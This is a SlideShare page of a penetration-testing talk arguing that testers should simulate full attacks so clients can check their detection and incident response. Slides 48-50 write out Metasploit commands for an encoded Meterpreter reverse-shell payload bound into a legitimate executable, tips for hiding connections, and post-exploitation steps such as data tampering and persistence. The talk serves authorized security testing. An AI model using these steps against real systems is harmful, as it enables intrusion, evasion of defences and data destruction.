SlideShare a Scribd company logo
Simulating Real
 World Attacks
   Thomas Mackenzie
Acknowledgements

Chris Nickerson


Carlos Perez

Simon Whitehouse
Introduction / Scope
Are clients aware of attacks happening to
them?


If they are not, how can we help them?


How can we test if they aware of an attack?
Remediation of an Attack
Remediation -
 Step One -
   Fixing the vulnerability that was exploited


 Step Two -
   Dealing with what happened post exploitation
Case Study
Lush.co.uk


They found out at the end of January about the
attack


Stated that the attack started “they think” on
the 4th October
Case Study cont.
Zurich UK


Lost 46,000 Customer Records


Found out 1 year later


Cost £2.28 million in fines - Not to mention fixing
Case Study cont.
Chain of events -
 When did it start?
 When did it end?
 What information was available to the attacker?
 What information was compromised?


Not counting -
 How it happened.
 How to stop it from happening again.
What am I saying?
Yes -
 If they knew about the vulnerability in the first place
 they could have stopped this from happening.



But they didn’t -
 The attack happened and it has cost them money to
 not just fix but to the chain of events stuff too.
Attacks we see
Layer 8 (Management)


Development Issues


0-Days


Passive Actions / Obfuscation Methods
Attacks we see cont.
These attacks are what we are seeing at the
moment.


When we do testing for clients we stop at the
vulnerability.


We stop at the exploit and we do not carry on.
Attacks we see cont.

Stopping at the vulnerability means -
 The client get to do Step One of remediation



What about Step Two?
It is important!!!
  Without the proper things in place it can take
  a long time to fix this.

      Self Detection




   Law Enforcement




    Public Detection




Regulatory Detection



                       0   50   100   150   200
Why didn’t they know?
There are a lot of things in place at the
moment that help people detect attacks / even
stop them.
 IDS / IPS / FW / Logs etc.


Attacks are still occurring and we are still
hearing about them all the time.
Why didn’t they know? cont.
Do we test this in our pen test?


How can we test if they are aware of an
attack?


Certainly not by just exploiting the
vulnerability we have to deep dive.
Is it Real?


Unless what you do is real your
client WILL NOT CARE!
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Simulating Real World Attack
Ask them!

Ask them what they care about


Why do they care?
The Brand
Employees
Customers
Money
Unless...

Unless the attack happens for real they don’t
have to deal with the aftermath!


Are they prepared?
IR

Not all companies have IR teams


How long does it take for the attackers trail to
be found?
Knowing you have been compromised = good


When and how long for = better
Reporting

When it comes to the report attack them with
simulated examples - examples you could
recreate.
 Could you kill someone?
 Can you steal money?
 Can you change / recreate their product?
Report cont.
Give a time window / speak to only one person


Document everything you do


Ask them what they saw you do


Compare
Did they know?

Did they know you were attacking them


If so did they try to stop you?


If not why not!
Simulating Real World Attack
Noise Levels
Low -
 Ninja Hacking Skillz




Medium -
 Make a few mistakes that should be detected




High -
 Scan them to hell and back
Graded Levels


Level 1 - 5


Starting at Script Kiddies to Criminal
What are we doing!


Attacking systems with real results instead of
just giving information they don’t care about.
Methods


Low hanging fruit are the first checkpoints
 Processes, connections, EventLog and in some case
 memory dumps
Processes
Time of creation


Parent PID


Owner


Command Line
Hide!
Hide your connections


SVCHOST.exe looks normal if connecting to
high ports


Firefox, Dropbox, AV 80 and 443
Example

So what are we actually talking about?


How can we go about simulating an attack
like what we have just spoken about?
Ask and you shall receive

Brief


Discuss options for testing


What is important to them?
Seek and you will find

What was important to them?


Are they any exploits / 0-days for that piece of
software?
Knock and the door will be
          opened
Simply and easily do not give up


There is always going to be some avenue of
attack for this client they may just not know
about it


Look at the following example
Attacking Layer 8
Idiots in the company are your first point of
call.


Is the CEO an idiot?


Skype is important to them - attack them with
what is important!
Attacking Layer 8 cont.
./msfpayload windows/meterpreter/reverse_tcp
LHOST = x.x.x.x R | ./msfencode -e x86/
shikata_ga_nai -c 5 -t exe -o payload.exe
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST x.x.x.x
exploit
Attacking Layer 8 cont.
Using IExpress you can bind a primary .exe.
and your payload together


Settings available in IExpress


Running that evil .exe (BANG) reverse shell!
Do not leave it there!
What did I say at the beginning?


Once you have shell do something with it so
that it actually means something to them


Delete data / change data / get addresses /
create ways to stay there!
But WAIT!!! POLITICS!

You cannot just delete data without
permission!


Make sure you find out what you can do!
If you can delete...


You most likely can add
What is better?
What is better?
This?
What is better?
What is better?
This?
WHAT IS ALL THIS!


By simulating theses attacks the way I am
talking about the client can then see exactly
what they would need to do if it was a real
attack!
Future


@sponex and I are creating a website about
this and some guides that link to some good
methodologies out there.
Summary
Attack them, don’t pussy foot around!


Find out what they care about.


Make them realise how hard it would be to
fix.
:~$ whoami
      Director of upSploit
      Limited
      Soon to be Web
      Application Security
      Consultant for
      Trustwave
      British Student
      Podcaster
Questions
   thomas@tmacuk.co.uk

www.tmacuk.co.uk / @tmacuk

www.upsploit.com / @upsploit

More Related Content

DOCX
How long until we become Mr Potato Head?
PPT
Marc Recommendations For Parents
PPTX
UX Sofia 2011 - Conrad Albrecht-Buehler
PDF
Effective feedback design
PPTX
Cyber bullying
PPTX
Управление рисками: как перестать верить в иллюзии
PDF
SafetyCoach_Five Critical Mistakes Safety Professionals Make
PDF
How long until we become Mr Potato Head?
Marc Recommendations For Parents
UX Sofia 2011 - Conrad Albrecht-Buehler
Effective feedback design
Cyber bullying
Управление рисками: как перестать верить в иллюзии
SafetyCoach_Five Critical Mistakes Safety Professionals Make

Similar to Simulating Real World Attack (20)

PPTX
Cyber Attacks and Defences - JNTUH,Cyber Attacks and Defences
PDF
Do You Write Secure Code? by Erez Metula
PPT
Get Ready for Web Application Security Testing
PPT
Information security
PDF
Client-Side Penetration Testing Presentation
PDF
Hiding in Plain Sight: The Danger of Known Vulnerabilities
PPTX
State of the information security nation
PPT
Web Application Security
ODP
Web application-security-and-why-you-should-review-yours
PPT
PPTX
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
PPT
Edith Turuka: Cyber-Security, An Eye Opener to the Society
PDF
Break IT Down by Josh Smith
PPTX
Vulnerability Management
PDF
Threats, Threat Modeling and Analysis
PPTX
Emerging Threats to Infrastructure
PDF
Top Security Challenges Facing Credit Unions Today
PPTX
It security the condensed version
PPTX
Cyber security awareness for end users
PPT
How to become Hackers .
Cyber Attacks and Defences - JNTUH,Cyber Attacks and Defences
Do You Write Secure Code? by Erez Metula
Get Ready for Web Application Security Testing
Information security
Client-Side Penetration Testing Presentation
Hiding in Plain Sight: The Danger of Known Vulnerabilities
State of the information security nation
Web Application Security
Web application-security-and-why-you-should-review-yours
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
Edith Turuka: Cyber-Security, An Eye Opener to the Society
Break IT Down by Josh Smith
Vulnerability Management
Threats, Threat Modeling and Analysis
Emerging Threats to Infrastructure
Top Security Challenges Facing Credit Unions Today
It security the condensed version
Cyber security awareness for end users
How to become Hackers .
Ad

Recently uploaded (20)

PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PDF
Network Security Unit 5.pdf for BCA BBA.
PPTX
MYSQL Presentation for SQL database connectivity
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PPTX
Big Data Technologies - Introduction.pptx
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
PDF
Spectral efficient network and resource selection model in 5G networks
DOCX
The AUB Centre for AI in Media Proposal.docx
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
PDF
Machine learning based COVID-19 study performance prediction
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
PPT
Teaching material agriculture food technology
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Network Security Unit 5.pdf for BCA BBA.
MYSQL Presentation for SQL database connectivity
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Big Data Technologies - Introduction.pptx
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Effective Security Operations Center (SOC) A Modern, Strategic, and Threat-In...
Spectral efficient network and resource selection model in 5G networks
The AUB Centre for AI in Media Proposal.docx
Building Integrated photovoltaic BIPV_UPV.pdf
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
Machine learning based COVID-19 study performance prediction
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Dropbox Q2 2025 Financial Results & Investor Presentation
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Chapter 3 Spatial Domain Image Processing.pdf
Review of recent advances in non-invasive hemoglobin estimation
Per capita expenditure prediction using model stacking based on satellite ima...
Teaching material agriculture food technology
CIFDAQ's Market Insight: SEC Turns Pro Crypto
Ad

Simulating Real World Attack

  • 1. Simulating Real World Attacks Thomas Mackenzie
  • 3. Introduction / Scope Are clients aware of attacks happening to them? If they are not, how can we help them? How can we test if they aware of an attack?
  • 4. Remediation of an Attack Remediation - Step One - Fixing the vulnerability that was exploited Step Two - Dealing with what happened post exploitation
  • 5. Case Study Lush.co.uk They found out at the end of January about the attack Stated that the attack started “they think” on the 4th October
  • 6. Case Study cont. Zurich UK Lost 46,000 Customer Records Found out 1 year later Cost £2.28 million in fines - Not to mention fixing
  • 7. Case Study cont. Chain of events - When did it start? When did it end? What information was available to the attacker? What information was compromised? Not counting - How it happened. How to stop it from happening again.
  • 8. What am I saying? Yes - If they knew about the vulnerability in the first place they could have stopped this from happening. But they didn’t - The attack happened and it has cost them money to not just fix but to the chain of events stuff too.
  • 9. Attacks we see Layer 8 (Management) Development Issues 0-Days Passive Actions / Obfuscation Methods
  • 10. Attacks we see cont. These attacks are what we are seeing at the moment. When we do testing for clients we stop at the vulnerability. We stop at the exploit and we do not carry on.
  • 11. Attacks we see cont. Stopping at the vulnerability means - The client get to do Step One of remediation What about Step Two?
  • 12. It is important!!! Without the proper things in place it can take a long time to fix this. Self Detection Law Enforcement Public Detection Regulatory Detection 0 50 100 150 200
  • 13. Why didn’t they know? There are a lot of things in place at the moment that help people detect attacks / even stop them. IDS / IPS / FW / Logs etc. Attacks are still occurring and we are still hearing about them all the time.
  • 14. Why didn’t they know? cont. Do we test this in our pen test? How can we test if they are aware of an attack? Certainly not by just exploiting the vulnerability we have to deep dive.
  • 15. Is it Real? Unless what you do is real your client WILL NOT CARE!
  • 25. Ask them! Ask them what they care about Why do they care?
  • 29. Money
  • 30. Unless... Unless the attack happens for real they don’t have to deal with the aftermath! Are they prepared?
  • 31. IR Not all companies have IR teams How long does it take for the attackers trail to be found?
  • 32. Knowing you have been compromised = good When and how long for = better
  • 33. Reporting When it comes to the report attack them with simulated examples - examples you could recreate. Could you kill someone? Can you steal money? Can you change / recreate their product?
  • 34. Report cont. Give a time window / speak to only one person Document everything you do Ask them what they saw you do Compare
  • 35. Did they know? Did they know you were attacking them If so did they try to stop you? If not why not!
  • 37. Noise Levels Low - Ninja Hacking Skillz Medium - Make a few mistakes that should be detected High - Scan them to hell and back
  • 38. Graded Levels Level 1 - 5 Starting at Script Kiddies to Criminal
  • 39. What are we doing! Attacking systems with real results instead of just giving information they don’t care about.
  • 40. Methods Low hanging fruit are the first checkpoints Processes, connections, EventLog and in some case memory dumps
  • 41. Processes Time of creation Parent PID Owner Command Line
  • 42. Hide! Hide your connections SVCHOST.exe looks normal if connecting to high ports Firefox, Dropbox, AV 80 and 443
  • 43. Example So what are we actually talking about? How can we go about simulating an attack like what we have just spoken about?
  • 44. Ask and you shall receive Brief Discuss options for testing What is important to them?
  • 45. Seek and you will find What was important to them? Are they any exploits / 0-days for that piece of software?
  • 46. Knock and the door will be opened Simply and easily do not give up There is always going to be some avenue of attack for this client they may just not know about it Look at the following example
  • 47. Attacking Layer 8 Idiots in the company are your first point of call. Is the CEO an idiot? Skype is important to them - attack them with what is important!
  • 48. Attacking Layer 8 cont. ./msfpayload windows/meterpreter/reverse_tcp LHOST = x.x.x.x R | ./msfencode -e x86/ shikata_ga_nai -c 5 -t exe -o payload.exe ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x exploit
  • 49. Attacking Layer 8 cont. Using IExpress you can bind a primary .exe. and your payload together Settings available in IExpress Running that evil .exe (BANG) reverse shell!
  • 50. Do not leave it there! What did I say at the beginning? Once you have shell do something with it so that it actually means something to them Delete data / change data / get addresses / create ways to stay there!
  • 51. But WAIT!!! POLITICS! You cannot just delete data without permission! Make sure you find out what you can do!
  • 52. If you can delete... You most likely can add
  • 55. This?
  • 58. This?
  • 59. WHAT IS ALL THIS! By simulating theses attacks the way I am talking about the client can then see exactly what they would need to do if it was a real attack!
  • 60. Future @sponex and I are creating a website about this and some guides that link to some good methodologies out there.
  • 61. Summary Attack them, don’t pussy foot around! Find out what they care about. Make them realise how hard it would be to fix.
  • 62. :~$ whoami Director of upSploit Limited Soon to be Web Application Security Consultant for Trustwave British Student Podcaster
  • 63. Questions thomas@tmacuk.co.uk www.tmacuk.co.uk / @tmacuk www.upsploit.com / @upsploit